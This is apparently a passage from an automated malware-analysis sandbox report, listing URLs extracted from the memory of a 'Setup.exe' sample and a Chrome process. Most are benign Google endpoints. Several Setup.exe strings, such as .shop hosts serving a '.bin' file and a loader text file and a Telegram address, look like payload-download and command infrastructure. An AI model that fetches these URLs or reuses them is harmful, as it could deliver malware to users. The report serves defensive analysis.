Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64_win_third_p
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebndkojlmppeemj
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.0/jamhcnnkih
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0/oimompecagn
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/acy5mdne3lup4k7xyd5szdvx6hqa_477/lmelglejhemejginpbo
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0/gonpemdgkjc
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/adrga7eefaxjfdmmgfkiaxjg4yjq_2024.7.12.235938/eeigpn
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmjkmgdlgnkkcoc
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.1305/cocncanlea
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/cxmnq7ci5es7kes4fruun62via_2024.12.17.1202/ggkkehgbn
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/kiabhabjdbkj
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/neifaoindggfcj
Source: chrome.exe, 00000002.00000002.2943659637.0000620400A44000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://dl.google.com/release2/chrome_component/j2hxfei2occ5siitujtlwgp6xi_3/ojhpjlocmbogdgmfpkhlaae
Source: chrome.exe, 00000002.00000002.2939749571.000062040030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944720817.0000620400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942524679.00006204007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942648813.000062040080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944720817.0000620400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942524679.00006204007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942648813.000062040080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944720817.0000620400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942524679.00006204007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942648813.000062040080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945845923.0000620400F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942239090.0000620400760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945845923.0000620400F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942239090.0000620400760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000002.00000002.2939749571.000062040030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-1.corp.google.c
Source: chrome.exe, 00000002.00000002.2939749571.000062040030C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-3.corp.googl
Source: chrome.exe, 00000002.00000002.2939749571.000062040030C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1908096372.0000620400490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-daily-5.corp.google.com/
Source: chrome.exe, 00000002.00000002.2939749571.000062040030C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1908096372.0000620400490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-preprod.corp.google.com/
Source: chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
Source: chrome.exe, 00000002.00000002.2939749571.000062040030C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1908096372.0000620400490000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: chrome.exe, 00000002.00000002.2944153810.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1913651793.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2941124815.00006204005D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/?q=
Source: chrome.exe, 00000002.00000002.2944153810.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1913651793.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chrome.exe, 00000002.00000002.2944153810.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1913651793.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.ico
Source: chrome.exe, 00000002.00000002.2944153810.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1913651793.0000620400BD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icondTripTime
Source: chrome.exe, 00000002.00000002.2949751122.00006204029C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/AMpg5-cnrANo_2018.8.8.0/2018.8.8.0_win64
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ac6mhlwypzipnufijdvfyhdgvt4q_67/khaoiebn
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaldksiunzh56452py2db5mnbpa_120.0.6050.
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acccxbt6wwsvpxzpob4hojndwkqq_4.10.2830.0
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acgz7p5akfecfxfz5dlgs3o2fisa_1174/efnioj
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acy5mdne3lup4k7xyd5szdvx6hqa_477/lmelgle
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2951057505.0000620403355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adm5fg7myczym5ugfpmw2lireirq_2024.11.8.0
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/ads7ltfl2gw6hxwgakn3sxrkoijq_9.53.0/gcmj
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cpx7rw4q3nwu7emczqf2w6cu7y_2023.3.30.130
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/cxmnq7ci5es7kes4fruun62via_2024.12.17.12
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/eoxvpqsyhqbmcsgpe27edattly_3057/jflookgn
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2951057505.0000620403355000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fw4ggtylvtq6i65ti33m4vqijm_2024.12.14.1/
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/imoffpf67hel7kbknqflao2oo4_1.0.2738.0/ne
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://edgedl.me.gvt1.com/edgedl/release2/chrome_component/irpc4pc5k7rvcvkvdmlbguhli4_9429/hfnkpiml
Source: chrome.exe, 00000002.00000003.1904706618.0000298C00690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2937240973.0000298C00798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
Source: chrome.exe, 00000002.00000003.1904706618.0000298C00690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(k
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946368926.000062040280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/2J
Source: chrome.exe, 00000002.00000003.1904706618.0000298C00690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2937240973.0000298C00798000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/
Source: chrome.exe, 00000002.00000003.1904706618.0000298C00690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/)
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946368926.000062040280C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/2P
Source: chrome.exe, 00000002.00000003.1904706618.0000298C00690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/Ena
Source: chrome.exe, 00000002.00000003.1904706618.0000298C00690000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google-ohttp-relay-query.fastly-edge.com/https://chromekanonymityquery-pa.googleapis.com/htt
Source: chrome.exe, 00000002.00000002.2938135756.0000620400013000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/googleapis.com
Source: chrome.exe, 00000002.00000002.2941287273.0000620400614000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://googleusercontent.com/
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: Setup.exe, 00000000.00000003.1833948719.0000000000A94000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1833987662.0000000000A4F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834135161.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: Setup.exe, 00000000.00000002.2280336341.000000000321C000.00000002.10000000.00040000.00000000.sdmp, Setup.exe, 00000000.00000002.2279565571.0000000002D50000.00000040.00001000.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2279973407.0000000003100000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://https://t.me/sdfasdjrhttps:///ujs/strwvstrfncfuck
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/161903006
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/166809097
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/184850002
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/187425444
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944875965.0000620400D14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/220069903
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/229267970
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/250706693
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/253522366
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944875965.0000620400D14000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/255411748
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/258207403
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/274859104
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945149057.0000620400D90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/284462263
Source: chrome.exe, 00000002.00000003.1912641900.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944720817.0000620400CD0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://issuetracker.google.com/issues/166475273
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944720817.0000620400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942524679.00006204007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942648813.000062040080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTE
Source: chrome.exe, 00000002.00000002.2940561447.00006204004BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944720817.0000620400CD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942524679.00006204007BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942648813.000062040080C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEkly
Source: Setup.exe, 00000000.00000003.1878125881.0000000003C00000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txt
Source: Setup.exe, 00000000.00000003.1878125881.0000000003C00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txtL
Source: Setup.exe, 00000000.00000002.2277405706.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klipcatepiu0.shop/int_clp_ldr_sha.txtpp
Source: Setup.exe, 00000000.00000002.2277405706.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klippetamea8.shop/NAURGGBG953NT9QEQBG3.bin
Source: Setup.exe, 00000000.00000002.2277405706.0000000000A58000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://klippetamea8.shop/NAURGGBG953NT9QEQBG3.bin8c70371/
Source: chrome.exe, 00000002.00000002.2943472168.00006204009F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946444464.0000620402D88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2937155620.0000298C0077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946773749.0000620402D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2936001377.0000298C0027C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboard2
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946444464.0000620402D88000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946773749.0000620402D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiment/2/springboardb
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943472168.00006204009F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2937155620.0000298C0077C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search/experiments
Source: chrome.exe, 00000002.00000003.1953659120.0000620401C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952249136.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940317520.0000620400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://labs.google.com/search?source=ntp
Source: chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/upload
Source: chrome.exe, 00000002.00000003.1918543284.0000620400390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/uploadbyurl
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/2
Source: chrome.exe, 00000002.00000003.1905063132.0000298C006F4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918698794.000062040120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918653153.0000620401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2937240973.0000298C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904972257.0000298C006F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload
Source: chrome.exe, 00000002.00000003.1904473138.0000298C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1946564471.0000620400D74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1904165756.0000298C00394000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/upload2
Source: chrome.exe, 00000002.00000002.2937124658.0000298C00750000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://lens.google.com/v3/uploadcompanion-iph-blocklisted-page-urlsexps-registration-success-page-u
Source: chrome.exe, 00000002.00000003.1936960980.0000620400D58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2939783779.000062040032C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c1
Source: Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1906873945.00006204001C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://m.google.com/devicemanagement/data/api
Source: chrome.exe, 00000002.00000003.1953659120.0000620401C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952249136.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2940317520.0000620400444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://mail.google.com/mail/?tab=rm&ogbl
Source: Setup.exe, 00000000.00000003.1833987662.0000000000A56000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1834175101.0000000000A3C000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.2277405706.00000000009DA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: chrome.exe, 00000002.00000002.2940720564.00006204004F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945845923.0000620400F00000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2942239090.0000620400760000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myaccount.google.com/?utm_source=ga-chrome-actions&utm_medium=manageGA
Source: chrome.exe, 00000002.00000002.2943318938.00006204009B7000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2943277729.0000620400974000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://myactivity.google.com/
Source: chrome.exe, 00000002.00000002.2939291138.00006204001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oauthaccountmanager.googleapis.com/
Source: chrome.exe, 00000002.00000003.1952537279.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952731543.0000620402FB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1952700993.0000620403134000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953625797.0000620403088000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953393315.00006204030A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953579957.000062040306C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2950780851.00006204030B1000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1953155697.00006204030D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogads-pa.googleapis.com
Source: chrome.exe, 00000002.00000002.2946015574.0000620400F69000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.goog
Source: chrome.exe, 00000002.00000003.1954764199.00006204002B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1954141326.0000620400D58000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2944906788.0000620400D24000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2945527446.0000620400E2C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2946410081.00006204010FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.2938409098.0000620400094000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ogs.google.com
